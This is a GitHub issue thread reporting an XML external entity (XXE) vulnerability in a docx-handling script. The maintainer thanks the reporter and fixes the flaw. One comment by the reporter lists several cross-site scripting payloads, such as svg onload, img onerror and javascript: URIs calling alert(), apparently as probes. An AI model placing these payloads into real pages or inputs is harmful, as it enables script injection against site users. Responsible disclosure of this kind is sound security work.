### ISSUE TITLE
Script vulnerable to XXE.

### ISSUE THREAD

**Issue by nahamsec** [PhilGale92/docx#43]
Hello,
We have came across this script, after an audit, we have confirmed that it's vulnerable to an XXE (https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing).

**Comment by nahamsec** [comment]
<input/autofocus/onfocus= setTimeout(URL.slice(-7))//#alert()


"><svg/onload=window.onerror=alert;throw/XSS/;//
javascript:alert(document.domain+"http://")

‘“><img src=x onerror=alert(4)>


callback= javascript://anything%0D%0A%0D%0Awindow.alert(1)//

“><iframe/src="javascript:alert(1)">

**Comment by razuro** [comment]
Quick response. Cool.

**Comment by PhilGale92** [comment]
Cheers for notifying me on this - I didn't even know about XXE before so its nice to learn something new!

I would have to add that this script was made only to be ran by trusted users (as with any/most file-upload relates scripts).

**Comment by nahamsec** [comment]
Good job on the quick fix :+1:! OWASP has really good resources for webapp security. We came across your script and figured it wouldn't hurt much to let you know there's a vulnerability there
